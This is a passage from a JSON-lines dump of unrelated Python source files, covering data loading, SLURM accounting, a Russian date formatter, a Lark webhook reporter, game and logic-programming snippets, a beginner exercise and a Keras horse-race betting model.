= np.array([load_image(f) for f in img_files])\n # astype(\"S\") to use ASCII encoding (instead of unicode).\n labels = np.array([_to_label(f) for f in img_files]).astype(\"S\")\n _save_h5(output, imgs, labels)\n\n\ndef load(filename):\n \"\"\" Load training dataset from h5 file. 
\"\"\"\n    result = {}\n    with h5py.File(filename, \"r\") as hf:\n        result[\"images\"] = hf[\"images\"][()]\n        # Convert back to unicode (Python 3 strings)\n        result[\"labels\"] = hf[\"labels\"][()].astype(\"U\")\n    return result\n","sub_path":"training/archive_data.py","file_name":"archive_data.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"645345490","text":"import numpy as np\nimport tensorflow as tf\nimport collections\nimport zipfile\n\ndef readvecfile(filename):\n\tfile = open(filename, 'r')\n\twordvec = dict()\n\twordindex = dict()\n\tfor line in file:\n\t\tline = line.strip(' \\n')\n\t\tdata = line.split(\":\")\n\t\tword = data[0]\n\t\tvec = data[1].split(\" \")\n\t\t# parse each component as a float and build the vector\n\t\tvec = np.array([float(v) for v in vec])\n\t\twordvec[word] = vec\n\t\twordindex[word] = len(wordindex)\n\treturn wordvec, wordindex\n\nwordvec, wordindex = readvecfile(\"true_embed\")\nprint(wordindex)\n\ndef readdata(filename, n_word):\n\tfile = open(filename, 'r')\n\ttext = \"\"\n\tfor l in file:\n\t\ttext = text + l.strip('\\n') + \" \"\n\ttext = text.split(\" \")\n\tcount = [['UNK', -1]]\n\tcount.extend(collections.Counter(text).most_common(n=n_word))\n\tdictionary = dict()\n\tfor word, _ in count:\n\t\tdictionary[word] = len(dictionary)\n\tdata = list()\n\tunk_count = 0\n\tfor word in text:\n\t\tif word in dictionary:\n\t\t\tindex = dictionary[word]\n\t\telse:\n\t\t\tindex = 0\n\t\t\tunk_count += 1\n\t\tdata.append(index)\n\tcount[0][1] = unk_count\n\treverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n\treturn data, count, dictionary, reverse_dictionary\n\ndata, count, dictionary, reverse_dictionary = readdata('english', 100)\n\ndef getembedings(dictionary, wordvec):\n\tembeddings = np.zeros(((len(dictionary),128)))\n\tfor word in dictionary:\n\t\t#print(word)\n\t\tif word in wordvec:\n\t\t\tprint(word)\n\t\t\tembeddings[dictionary[word]] = wordvec[word]\n\treturn embeddings\n\nembeddings = getembedings(dictionary, wordvec)\n#print(embeddings)\nem = tf.Variable(initial_value=embeddings)\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n\tinit.run()\n#\tprint(em[1].eval())\n\n","sub_path":"window_pre/readvec.py","file_name":"readvec.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"177028111","text":"\"\"\"\nUses 'SLURM sacct' to compute the number of CPU and MPP hours\n\"\"\"\n\nimport pandas as pd\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef cpu_hrs(nodes,h,m,s, mpp=False,cori=True):\n    \"\"\"\n    Args:\n    nodes: number of nodes\n    h,m,s: hours,min,sec\n    \"\"\"\n    cores_per_node=32\n    if not cori:\n        cores_per_node=24\n    mpp_factor= 1.\n    if mpp:\n        mpp_factor= 2.5\n        if not cori:\n            mpp_factor= 2.\n\n    # total elapsed hours, scaled by cores per node, node count and the charge factor\n    return mpp_factor * cores_per_node * nodes * (h + m/60. + s/3600.)\n\ndef dobash(cmd):\n    print('UNIX cmd: %s' % cmd)\n    if os.system(cmd): raise ValueError\n\nif __name__ == '__main__':\n    #sacct -A desi --user=kaylanb --format=JobID,State,NNodes,Elapsed,Start -S 11/17/17 -E 12/03/17|grep COMPLETED > my_sacct.txt\n\n    from argparse import ArgumentParser\n    parser = ArgumentParser()\n    parser.add_argument('--sacct_fn', type=str, required=True, help='output of sacct dumped to a text file')\n    args = parser.parse_args()\n\n    a=pd.read_csv(args.sacct_fn,\n                  delim_whitespace=True,header=None,\n                  names=['slurm_id','status','num_nodes','time','start'])\n\n    for i,name in zip([0,1,2],['multi_hr','min','sec']):\n        a[name]= a['time'].str.split(':').str[i]\n\n    print(a['multi_hr'].str.split('-').str.len().value_counts())\n    hasExtra24= a['multi_hr'].str.split('-').str.len() > 1\n    a['extra_hrs']= np.zeros(a.shape[0])\n    a.loc[hasExtra24,'extra_hrs']= 24*a.loc[hasExtra24,'multi_hr'].str.split('-').str[0].astype(float)\n    a['extra_hrs'].value_counts()\n\n    a['hrs']= np.zeros(a.shape[0])\n    # No 01-05, just 05\n    a.loc[~hasExtra24,'hrs']= a.loc[~hasExtra24,'multi_hr'].astype(float)\n    # When 01-05, just take 05\n    a.loc[hasExtra24,'hrs']= a.loc[hasExtra24,'multi_hr'].str.split('-').str[1].astype(float)\n    a.loc[:,'hrs'] += a['extra_hrs']\n\n    for col in ['min','sec']:\n        a.loc[:,col]= a.loc[:,col].astype(float)\n\n    a['cpu_hrs']= cpu_hrs(a['num_nodes'],a['hrs'],a['min'],a['sec'])\n    print('total cpu hours (M):',a['cpu_hrs'].sum()/1e6)\n    print('total MPP hours (M):',a['cpu_hrs'].sum()/1e6*2.5)\n\n\n    ## Plots\n    fig,ax= plt.subplots(2,2,figsize=(6,6))\n    names=['num_nodes','hrs','min','sec']\n    i=0\n    for row in range(2):\n        for col in range(2):\n            sns.distplot(a[names[i]],ax=ax[row,col])\n            i+=1\n    fn='nodes_hrs_min_sec.png'\n    plt.savefig(fn,dpi=150)\n    print('Wrote %s' % fn)\n","sub_path":"py/obiwan/qa/cpu_hours.py","file_name":"cpu_hours.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"431517958","text":"#Дана дата в формате dd.mm.yyyy, например: 02.11.2013. Ваша задача — вывести дату в текстовом виде,\n# например: второе ноября 2013 года. 
Склонением пренебречь (2000 года, 2010 года)\nnumber_data = '13.03.1986'\nsplit_data = number_data.split('.')\n\nfibs_days = (0, 'первое', 'второе', 'третье', 'четвертое', 'пятое', 'шестое', 'седьмое', 'восьмое', 'девятое',\n 'десятое', 'одиннадцатое', 'двенадцатое', 'тринадцатое', 'четрынадцатое', 'пятнадцатое', 'шестнадцатое',\n 'семнадцатое', 'восемнадцатое', 'девятнадцатое', 'двадцатое', 'двадцать первое', 'двадцать второе',\n 'двадцать третье', 'двадцать четвертое', 'двадцать пятое', 'двадцать шестое', 'двадцать седьмое',\n 'двадцать восьмое', 'двадцать девятое', 'тридцатое', 'тридцать первое')\n\nfibs_months = (0, 'января', 'феврал', 'марта', 'апреля', 'мая', 'июня', 'июля', 'августа', 'сентября',\n 'октября', 'ноября', 'декабря')\n\nfor i in range(len(fibs_days)):\n if (int(split_data[0])) == i:\n split_data[0] = fibs_days[i]\n break\n\nfor i in range(len(fibs_months)):\n if (int(split_data[1])) == i:\n split_data[1] = fibs_months[i]\n break\n\nprint(split_data[0] + ' ' + split_data[1] + ' ' + split_data[2] + ' ' \"года\" )\n","sub_path":"practice2-2.py","file_name":"practice2-2.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"348066059","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/8/11 16:12\n# @Author : lihuacai\n# @Email : lihuacai168@gmail.com\n# @File : lark_message.py\n# @Software: PyCharm\nimport requests\nimport json\nfrom fastrunner import models\nfrom django.conf import settings\n\n\ndef get_base_post_content():\n return {\n \"msg_type\": \"post\",\n \"content\": {\n \"post\": {\n \"zh_cn\": {\n \"title\": \"\",\n \"content\": [\n ]\n }\n }\n }\n }\n\n\ndef parse_message(summary: dict, msg_type: str):\n task_name = summary[\"task_name\"]\n rows_count = summary['stat']['testsRun']\n pass_count = summary['stat']['successes']\n fail_count = summary['stat']['failures']\n error_count = summary['stat']['errors']\n duration = '%.2fs' % summary['time']['duration']\n report_id = models.Report.objects.last().id\n base_url = settings.IM_REPORT_SETTING.get('base_url')\n port = settings.IM_REPORT_SETTING.get('port')\n report_url = f'{base_url}:{port}/api/fastrunner/reports/{report_id}/'\n executed = rows_count\n fail_rate = '{:.2%}'.format(fail_count / executed)\n # 富文本\n if msg_type == 'post':\n msg_template = get_base_post_content()\n content = [[{'text': f'任务名称:{task_name}'}],\n [{'text': f'总共耗时: {duration}'}],\n [{'text': f'成功接口: {pass_count}'}],\n [{'text': f'异常接口: {error_count}'}],\n [{'text': f'失败接口: {fail_count}'}],\n [{'text': f'失败比例: {fail_rate}'}],\n [{'text': f'查看详情: {report_url}'}]]\n for d in content:\n d[0].update({'tag': 'text'})\n msg_template['content']['post']['zh_cn']['content'] = content\n return msg_template\n text = f\" 任务名称: {task_name}\\n 总共耗时: {duration}\\n 成功接口: {pass_count}个\\n 异常接口: {error_count}个\\n 失败接口: {fail_count}个\\n 失败比例: {fail_rate}\\n 查看详情: {report_url}\"\n return text\n\n\ndef send_message(summary: dict, webhook: str):\n \"\"\"\n\n \"\"\"\n # v1 https://open.feishu.cn/open-apis/bot/hook/xxx\n # v2 https://open.feishu.cn/open-apis/bot/v2/hook/xxx\n title = settings.IM_REPORT_SETTING.get('report_title')\n platform_name = settings.IM_REPORT_SETTING.get('platform_name', 'FasterRunner测试平台')\n if platform_name:\n title = platform_name + title\n version = webhook[37:39]\n if version == 'v2':\n msg = parse_message(summary=summary, msg_type='post')\n msg['content']['post']['zh_cn']['title'] = title\n data = msg\n else:\n msg = 
parse_message(summary=summary, msg_type=None)\n data = {\n \"title\": title,\n \"text\": msg\n }\n requests.post(url=webhook, data=json.dumps(data).encode(\"utf-8\"))\n","sub_path":"fastrunner/utils/lark_message.py","file_name":"lark_message.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"473258772","text":"import GameFrameWork\n\nfrom pico2d import *\n\n\nclass BackGround:\n def __init__(self):\n self.image1 = load_image('image/stage/stage1_01.png')\n self.image2 = load_image('image/stage/stage1_02.png')\n self.image3 = load_image('image/stage/stage1_03.png')\n #Sound\n self.bgm = load_music('sound/Stage1.mp3')\n self.bgm.set_volume(64)\n self.bgm.repeat_play()\n self.bossBgm = load_music('sound/boss_sound.mp3')\n self.bossBgm.set_volume(64)\n self.width = GameFrameWork.Width\n self.height = 6000\n\n self.x1, self.y1 = self.width / 2, self.height / 2 # 화면 초기값. stage1_01 초기값.\n self.x2, self.y2 = self.width / 2, self.height / 2 + GameFrameWork.Height # stage1_02화면 초기값.\n self.x3, self.y3 = self.width / 2, self.height / 2 + GameFrameWork.Height # stage1_02화면 초기값.\n self.move = 2.5\n\n def update(self, frame_time):\n if self.y1 > -(self.height / 2):\n self.y1 -= self.move\n if self.y1 < -(self.height / 2) + GameFrameWork.Height:\n self.y2 -= self.move\n if (self.y2 < -(self.height / 2) + GameFrameWork.Height) and (self.y3 > -(self.height / 2) + GameFrameWork.Height):\n self.y3 -= self.move\n\n def draw(self):\n self.image1.clip_draw(0, 0, self.width, self.height, self.x1, self.y1)\n self.image2.clip_draw(0, 0, self.width, self.height, self.x2, self.y2)\n self.image3.clip_draw(0, 0, self.width, self.height, self.x3, self.y3)","sub_path":"Return1945/BackGround.py","file_name":"BackGround.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"155367311","text":"import dlvhex\n\n# Python plugin implementation for the rq external atom.\ndef rq(predic):\n for x in dlvhex.getTrueInputAtoms():\n io = {'ind':'money','amalB':'goggles','altD':'yogamat','gansD':'money'}\n inp = x.tuple()[1].value()\n if predic == x.tuple()[0]:\n if inp in io:\n dlvhex.output((io[inp],))\n\n# register function\ndef register():\n dlvhex.addAtom(\"rq\", (dlvhex.PREDICATE, ), 1)\n","sub_path":"example_5_2/example_5_2.py","file_name":"example_5_2.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"427370202","text":"#Q1\r\na=(1,2,3,4,5,'car','bike') #take tupil which contains different types of data type\r\nprint(len(a)) #print the lenth of tupil eg number of varriable\r\n\r\n#Q2\r\nv=(1,5,3,7,33,9) #take a tupil which contain n number\r\nprint(max(v)) #from n numbers find the largest one from tupil and print the larest one\r\nprint(min(v)) #from n numbers find the smallest one from tupil and print the smallest one\r\n\r\n\r\n#Q3\r\nt=(1*2*3*4) #take a tupil and multipe it\r\nprint(t) #print the product of elementspresent in tupil\r\n\r\n#Q4(a)\r\ns1=set((1,2,3,4,5,6,7)) #take a set s1\r\ns2=set((1,3,6)) #take a set s2\r\ns3=s1-s2 #cmp s1 and s2 to have set s3\r\nprint(s3) #print s3 set\r\n\r\n#(b)\r\na1=set((1,2,3,4,5,6,7,8)) #take set a1\r\na2=set((2,4,5,7)) #take set a2\r\na3=a1>=a2 #if a1>=a2 then a1 is a super set of a2\r\nprint(\"a1 is super set of a2\") #print\r\nprint(a3) #print the set a3\r\na4=a1<=a2 #if a1<=a2 the a1 is a1 
issub set of a2\r\nprint(\"a1 is a subset of a2 \") #print\r\nprint(a4) #print set a4\r\n\r\n#(c)\r\nb1=set((1,2,3,4,5,6,7)) #take a set b1\r\nb2=set((2,4,7,9)) #take set b2\r\nb3=b1&b2 #take intersetion of two sets\r\nprint(b3) #print the interrsetion set\r\nprint(\"this is the intersection set\") #print\r\nb4=b1|b2 #take union of two sets\r\nprint(b4) #print the union of set\r\nprint(\"this is the unoin set\") #print\r\n\r\n#Q5\r\na=input(\"enter the name\") #enter the name you want\r\nb=input(\"enter marks\") #enter the marks\r\nd={'name':'a','marks':'b'} #make a dicitionary d\r\nprint(d) #print the dictionary\r\n#Q6\r\n\r\n\r\n#Q7\r\nl=('mississippi') #take a tupil which contains a sting in which there is a repeation of same letters\r\ncheck_for_m=l.count('m') #count the number of m\r\ncheck_for_i=l.count('i') #count the number of i\r\ncheck_for_s=l.count('s') #count the number of s\r\ncheck_for_p=l.count('p') #count the number of p\r\nd={'number of m':check_for_m,'number of i':check_for_i,'number of s':check_for_s,'number of p':check_for_p}\r\nprint(d) #print the dictionary d\r\n","sub_path":"assingnment_4.py","file_name":"assingnment_4.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"26472692","text":"# -*- coding:utf-8 -*-\n\n#\n#Let us pray the success of experiments\n#\n\nfrom keras.regularizers import l1,l2\nfrom keras.models import Sequential,Model,load_model\nfrom keras.layers import Dense,Activation,Input,Dropout,Concatenate,Conv2D,Add,ZeroPadding2D,GaussianNoise\nfrom keras.models import model_from_config\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.core import Reshape,Flatten,Permute,Lambda\nfrom keras.layers.pooling import GlobalAveragePooling2D,GlobalMaxPooling2D\nimport keras.optimizers\nimport numpy as np\nimport pandas as pd\nimport sqlite3, pickle,argparse,sys,random\nimport dataset2, util, evaluate\nimport place2vec, course2vec,field_fitness\nimport mutual_preprocess\n\n\nEVALUATE_INTERVAL = 10\nMAX_ITERATION = 50000\nBATCH_SIZE = 36\nREFRESH_INTERVAL = 50 \nPREDICT_TYPE = \"win_payoff\"\n#PREDICT_TYPE = \"place_payoff\"\nMODEL_PATH = \"./models/montecarlo.h5\"\nMEAN_PATH = \"./models/montecarlo.pickle\"\nSTD_PATH = \"./models/montecarlo.pickle\"\nCACHE_PATH = \"./cache/montecarlo\"\n\npd.set_option('display.height', 1000)\npd.set_option('display.width', 1000)\npd.set_option('display.max_rows', 1000)\npd.set_option('display.max_columns', 1000)\nnp.set_printoptions(threshold=np.nan)\n \ndef main(use_cache = False):\n #predict_type = \"place_payoff\"\n predict_type = PREDICT_TYPE\n config = util.get_config(\"config/config.json\")\n db_path = \"db/output_v12.db\"\n\n db_con = sqlite3.connect(db_path)\n if use_cache:\n print(\"[*] load dataset from cache\")\n datasets = dataset2.load_cache(CACHE_PATH)\n else:\n datasets = generate_dataset(predict_type,db_con,config)\n dnn(config.features,datasets)\n\ndef generate_dataset(predict_type,db_con,config):\n print(\"[*] preprocessing step\")\n print(\">> loading dataset\")\n main_features = config.features\n additional_features = [\"linfo_win_odds\",\"linfo_place_odds\"]\n load_features = main_features + additional_features\n x,p2v,y = mutual_preprocess.load_datasets_with_p2v(db_con,load_features)\n main_features = main_features + [\"info_race_id\"]\n\n additional_x = x.loc[:,additional_features]\n x = x.loc[:,main_features]\n\n col_dic = dataset2.nominal_columns(db_con)\n nom_col = 
dataset2.dummy_column(x,col_dic)\n x = dataset2.get_dummies(x,col_dic)\n\n main_features = sorted(x.columns.values.tolist())\n main_features_dropped = sorted(x.columns.drop(\"info_race_id\").values.tolist())\n additional_features = sorted(additional_x.columns)\n p2v_features = sorted(p2v.columns.values.tolist())\n\n x = concat(x,p2v)\n x = dataset2.downcast(x)\n del p2v\n\n print(\">> separating dataset\")\n con = concat(x,additional_x)\n train_con,test_con,train_y,test_y = dataset2.split_with_race(con,y,test_nums = 1000)\n train_x = train_con.loc[:,x.columns]\n train_add_x = train_con.loc[:,additional_x.columns]\n test_x = test_con.loc[:,x.columns]\n test_add_x = test_con.loc[:,additional_x.columns]\n train_x = dataset2.downcast(train_x)\n\n test_x = dataset2.downcast(test_x)\n del x,y,con,train_con,test_con\n \n print(\">> filling none value of datasets\")\n mean = train_x.mean(numeric_only = True)\n std = train_x.std(numeric_only = True).clip(lower = 1e-2)\n mean_odds = train_add_x.mean(numeric_only = True)\n #mean_std = train_add_x.std(numeric_only = True).clip(lower = 1e-2)\n save_value(mean,MEAN_PATH)\n save_value(std,STD_PATH)\n\n train_x = fillna_mean(train_x,mean)\n train_add_x = fillna_mean(train_add_x,mean_odds)\n test_x = fillna_mean(test_x,mean)\n test_add_x = fillna_mean(test_add_x,mean_odds)\n\n print(\">> normalizing datasets\")\n train_x = dataset2.normalize(train_x,mean = mean,std = std,remove = nom_col)\n test_x = dataset2.normalize(test_x,mean = mean,std = std,remove = nom_col)\n train_add_x = (train_add_x/100.0).clip(upper = 50)\n test_add_x = (test_add_x/100.0).clip(upper = 50)\n\n print(\">> adding extra information to datasets\")\n train_x,train_y = add_c2v(train_x,train_y,main_features_dropped,nom_col)\n test_x,test_y = add_c2v(test_x,test_y,main_features_dropped,nom_col)\n train_x,train_y = add_ff(train_x,train_y,main_features_dropped,nom_col)\n test_x,test_y = add_ff(test_x,test_y,main_features_dropped,nom_col)\n\n print(\">> generating target variable\")\n train_y[\"is_win\"] = train_y[\"win_payoff\"].clip(lower = 0,upper = 1)\n train_y[\"is_place\"] = train_y[\"place_payoff\"].clip(lower = 0,upper = 1)\n test_y[\"is_win\"] = test_y[\"win_payoff\"].clip(lower = 0,upper = 1)\n test_y[\"is_place\"] = test_y[\"place_payoff\"].clip(lower = 0,upper = 1)\n\n print(\">> converting train dataset to race panel\")\n features = sorted(train_x.columns.drop(\"info_race_id\").values.tolist())\n train_x,train_y,train_add_x = dataset2.pad_race(train_x,train_y,train_add_x)\n test_x,test_y,test_add_x = dataset2.pad_race(test_x,test_y,test_add_x)\n train_x = dataset2.downcast(train_x)\n train_y = dataset2.downcast(train_y)\n train_x,train_y,train_add_x = dataset2.to_race_panel(train_x,train_y,train_add_x)\n test_x,test_y,test_add_x = dataset2.to_race_panel(test_x,test_y,test_add_x)\n\n train_x = train_x.loc[:,:,features]\n train_add_x = train_add_x.loc[:,:,additional_features]\n train_y = train_y.loc[:,:,[\"place_payoff\",\"win_payoff\",\"is_win\",\"is_place\"]]\n test_x = test_x.loc[:,:,features]\n test_add_x = test_add_x.loc[:,:,additional_features]\n test_y = test_y.loc[:,:,[\"place_payoff\",\"win_payoff\",\"is_win\",\"is_place\"]]\n\n print(\">> prediting with dnn \")\n train_race_idx = train_x.axes[0]\n test_race_idx = test_x.axes[0]\n train_x = train_x.as_matrix()\n test_x = test_x.as_matrix()\n pred_model = load_model(\"./models/mlp_model3.h5\")\n\n train_x = pred_model.predict(train_x)\n train_x = pd.Panel({\"pred\":pd.DataFrame(train_x,index = train_race_idx)})\n train_x 
= train_x.swapaxes(0,1,copy = False)\n train_x = train_x.swapaxes(1,2,copy = False)\n train_x = pd.concat([train_x,train_add_x],axis = 2)\n\n test_x = pred_model.predict(test_x)\n test_x = pd.Panel({\"pred\":pd.DataFrame(test_x,index = test_race_idx)})\n test_x = test_x.swapaxes(0,1,copy = False)\n test_x = test_x.swapaxes(1,2,copy = False)\n test_x = pd.concat([test_x,test_add_x],axis = 2)\n print(train_x.shape)\n print(test_x.shape)\n\n datasets = {\n \"train_x\" : train_x,\n \"train_y\" : train_y,\n \"test_x\" : test_x,\n \"test_y\" : test_y,\n }\n dataset2.save_cache(datasets,CACHE_PATH)\n return datasets\n\ndef dnn(features,datasets):\n print(\"[*] training step\")\n target_y = \"place_payoff\"\n target_y = \"win_payoff\"\n train_x = datasets[\"train_x\"]\n train_y = datasets[\"train_y\"].loc[:,:,[target_y]] -100\n test_x = datasets[\"test_x\"].as_matrix()\n #test_y = datasets[\"test_y\"].loc[:,:,target_y].as_matrix().reshape([18,-1]).T-100\n test_y = datasets[\"test_y\"].loc[:,:,target_y].as_matrix()-100\n test_y = test_y.reshape([-1,18],order='F')\n \n max_iterate = 300000\n log_interval = 5\n model_swap_interval = 5\n model = create_model()\n old_model = clone_model(model)\n sampler = ActionSampler(train_x,train_y)\n \n pre_x = None\n pre_y = None\n for i in range(max_iterate):\n target_size = 5\n batch_size = 300\n x,y,act = sampler.get_sample(old_model,target_size,batch_size)\n model.fit(x,act,epochs = 1,batch_size = batch_size,verbose = 0)\n if i%log_interval == 0:\n log(i,model,x,y)\n log(i,model,test_x,test_y)\n if pre_x is not None:\n log(i,model,pre_x,pre_y)\n pre_x = x\n pre_y = y\n #print(pre_y.shape)\n if i%model_swap_interval == 0:\n print(\"swap\")\n old_model = clone_model(model)\n\nclass ActionSampler():\n\n def __init__(self,x,y,max_sampling = 1000):\n self.max_sampling = max_sampling\n self.x = x\n self.y = y\n self.con = pd.concat([self.x,self.y],axis = 2)\n\n self.x_col = x.axes[2].tolist()\n self.y_col = y.axes[2].tolist()\n self.y.axes[0] = self.x.axes[0]\n self.y.axes[1] = self.x.axes[1]\n \n def get_sample(self,model,target_size,batch_size):\n timeout = 10000\n sample_list_x = []\n sample_list_y = []\n sample_list_act = []\n for i in range(timeout):\n x,y = self.__random_sample(target_size)\n pred = model.predict(x)\n pred_act = np.round(pred)\n pred_value = eval_action(pred_act,y,target_size)\n\n best_value = pred_value\n best_act = pred_act\n should_push = False\n hit_count = 1.0\n for j in range(self.max_sampling):\n random_act = self.__generate_action(pred)\n eval_value = eval_action(random_act,y,target_size)\n if eval_value > best_value:\n best_value = eval_value\n best_act += random_act\n #best_act = random_act\n hit_count += 1\n should_push = True\n if should_push:\n best_act = best_act/hit_count\n sample_list_x.append(x)\n sample_list_y.append(y)\n sample_list_act.append(best_act)\n else:\n pass\n now_len = len(sample_list_x) * target_size\n if now_len >= batch_size:\n break\n ret_x = np.concatenate(sample_list_x,axis = 0)\n ret_y = np.concatenate(sample_list_y,axis = 0)\n ret_act = np.concatenate(sample_list_act,axis = 0)\n return (ret_x,ret_y,ret_act)\n\n def __generate_action(self,pred):\n pred_act = np.round(pred)\n dice = random.random()\n if dice < 0.2:\n random_act = np.random.randint(2,size = pred.shape)\n #random_act = random_inverts(0.03,pred_act)\n #max_value = 10000.0\n #prob = max((max_value-i)/max_value, 5e-2)\n #random_act = random_inverts(prob,pred_act)\n elif dice < 0.4:\n random_act = random_inverts(0.03,pred_act)\n else:\n #noise = 
(float(j)/max_iterate)/3\n noise = 0.1\n n_pred = np.clip(pred,noise,0.99-noise)\n random_act = np.random.binomial(1,n_pred)\n return random_act\n\n def __random_sample(self,batch_size):\n sample = self.con.sample(n = batch_size,axis = 0)\n x = sample.loc[:,:,self.x_col]\n y = sample.loc[:,:,self.y_col]\n\n x = x.as_matrix()\n y = y.as_matrix()\n y = y.reshape([-1,18],order='F')\n return (x,y)\n\n\ndef eval_action(action,payoff,batch_size):\n buy = np.sum(action)\n reward_matrix = action*payoff\n #hit_matrix = np.clip(reward_matrix,0,1)\n total_reward = np.sum(reward_matrix)\n #total_hit = np.sum(hit_matrix)\n reward_per = total_reward/buy if buy != 0 else 0\n #hit_per = total_hit/batch_size\n return max(reward_per,0.0)\n #return max(total_reward,0.0)\n\ndef log(epoch,model,x,y):\n pred = model.predict(x)\n pred_act = np.round(pred)\n reward_matrix = pred_act*y\n hit_matrix = np.clip(reward_matrix,0,1)\n total_hit = np.sum(hit_matrix)\n total_reward = np.sum(reward_matrix)\n buy = np.sum(pred_act)\n reward_per = float(total_reward/buy)\n print(\"Epoch {0}, Hit : {1}/{2}, Reward Per : {3}, Total Reward : {4}\".format(epoch,total_hit,buy,reward_per,total_reward))\n\n\ndef create_model(activation = \"relu\",dropout = 0.4,hidden_1 = 80,hidden_2 = 80,hidden_3 = 80):\n l2_coef = 0.01\n feature_size = 3\n inputs = Input(shape = (18,3))\n x = inputs\n\n \"\"\"\n x = Reshape([18,feature_size,1],input_shape = (feature_size*18,))(x)\n x = Conv2D(32,(1,3),padding = \"valid\",kernel_initializer=\"he_normal\",kernel_regularizer = l2(l2_coef))(x)\n x = Activation(activation)(x)\n x = BatchNormalization(momentum = 0)(x)\n x = Dropout(0.5)(x)\n\n x = Conv2D(32,(1,1),padding = \"valid\",kernel_initializer=\"he_normal\",kernel_regularizer = l2(l2_coef))(x)\n x = Activation(activation)(x)\n x = BatchNormalization(momentum = 0)(x)\n x = Dropout(0.5)(x)\n\n\n x = Conv2D(1,(1,1),padding = \"valid\",kernel_initializer=\"he_normal\",kernel_regularizer = l2(l2_coef))(x)\n x = Flatten()(x)\n\n \"\"\"\n x = Flatten()(inputs)\n #x = GaussianNoise(0.01)(x)\n\n x = Dense(units = 36,kernel_regularizer = l2(l2_coef))(x)\n #x = Activation(activation)(x)\n x = BatchNormalization(momentum = 0)(x)\n x = Dropout(0.6)(x)\n\n x = Dense(units = 18,kernel_regularizer = l2(l2_coef),bias_regularizer = l2(l2_coef))(x)\n outputs = Activation(\"sigmoid\")(x)\n\n model = Model(inputs = inputs,outputs = outputs)\n opt = keras.optimizers.Adam(lr=1e-2)\n #opt = keras.optimizers.SGD(lr=1e-1)\n #model.compile(loss = \"binary_crossentropy\",optimizer=opt,metrics=[\"accuracy\"])\n model.compile(loss = \"mse\",optimizer=opt,metrics=[\"accuracy\"])\n #model.compile(loss = \"categorical_crossentropy\",optimizer=opt,metrics=[\"accuracy\"])\n return model\n\ndef save_model(model,path):\n print(\"Save model\")\n model.save(path)\n\ndef save_value(v,path):\n with open(path,\"wb\") as fp:\n pickle.dump(v,fp)\n\ndef load_value(path):\n with open(path,\"rb\") as fp:\n v = pickle.load(fp)\n return v\n raise Exception (\"File does not exist\")\n\ndef to_descrete(array):\n res = np.zeros_like(array)\n res[array.argmax(1)] = 1\n return res\n\ndef concat(a,b):\n a.reset_index(inplace = True,drop = True)\n b.reset_index(inplace = True,drop = True)\n return pd.concat([a,b],axis = 1)\n\ndef add_c2v(x,y,features,nom_col):\n c2v_x = x.loc[:,features]\n c2v_df = course2vec.get_vector(c2v_x,nom_col)\n x = concat(x,c2v_df)\n y.reset_index(inplace = True,drop = True)\n del c2v_x\n del c2v_df\n return (x,y)\n\ndef add_ff(x,y,features,nom_col):\n ff_x = 
x.loc[:,features]\n ff_df = field_fitness.get_vector(ff_x,nom_col)\n x = concat(x,ff_df)\n y.reset_index(drop = True,inplace = True)\n del ff_x\n del ff_df\n return (x,y)\n\ndef fillna_mean(df,mean = None):\n if type(mean) == type(None):\n mean = df.mean(numeric_only = True)\n df = df.fillna(mean)\n else:\n df = df.fillna(mean)\n return df\n\ndef drange(begin, end, step):\n n = begin\n while n+step < end:\n yield n\n n += step\n\ndef random_inverts(p,matrix):\n matrix = matrix.astype(bool)\n random_mask = np.random.binomial(1,p,size = matrix.shape).astype(bool)\n random_value = np.random.randint(2,size = matrix.shape)\n ret = np.where(random_mask == True,random_value,matrix).astype(np.int32)\n return ret\n\ndef clone_model(model,custom_objects = {}):\n config = {\n 'class_name': model.__class__.__name__,\n 'config': model.get_config(),\n }\n clone = model_from_config(config, custom_objects=custom_objects)\n clone.set_weights(model.get_weights())\n return clone\n\n\nif __name__==\"__main__\":\n \"\"\"\n array = np.array([1,1,1,1,0,0,0,0])\n for i in range(10):\n print(random_inverts(0.9,array))\n \"\"\"\n parser = argparse.ArgumentParser(description=\"horse race result predictor using multilayer perceptron\")\n parser.add_argument(\"-c\",\"--cache\",action=\"store_true\",default=False)\n args = parser.parse_args()\n main(use_cache = args.cache)\n\n","sub_path":"trash/selfplay.py","file_name":"selfplay.py","file_ext":"py","file_size_in_byte":15250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"54141883","text":"# coding: utf-8\nimport os\nimport sys\n\n\n# Useful for very coarse version differentiation.\nPY3 = sys.version_info[0] == 3\n\nif PY3:\n from configparser import ConfigParser\n string_type = str\n string_empty = ''\nelse:\n from ConfigParser import SafeConfigParser as ConfigParser\n string_type = unicode\n string_empty = u''\n\n\nclass ConfigBase(object):\n \"\"\"\n Base class to make the API explicit.\n \"\"\"\n def __init__(self, config_file):\n raise NotImplemented\n\n def get(self, option, default=string_empty, cast=string_type):\n \"\"\"\n Return the value for option or default option is not defined.\n \"\"\"\n raise NotImplemented\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Convenient shortcut to get.\n \"\"\"\n return self.get(*args, **kwargs)\n\n\nclass 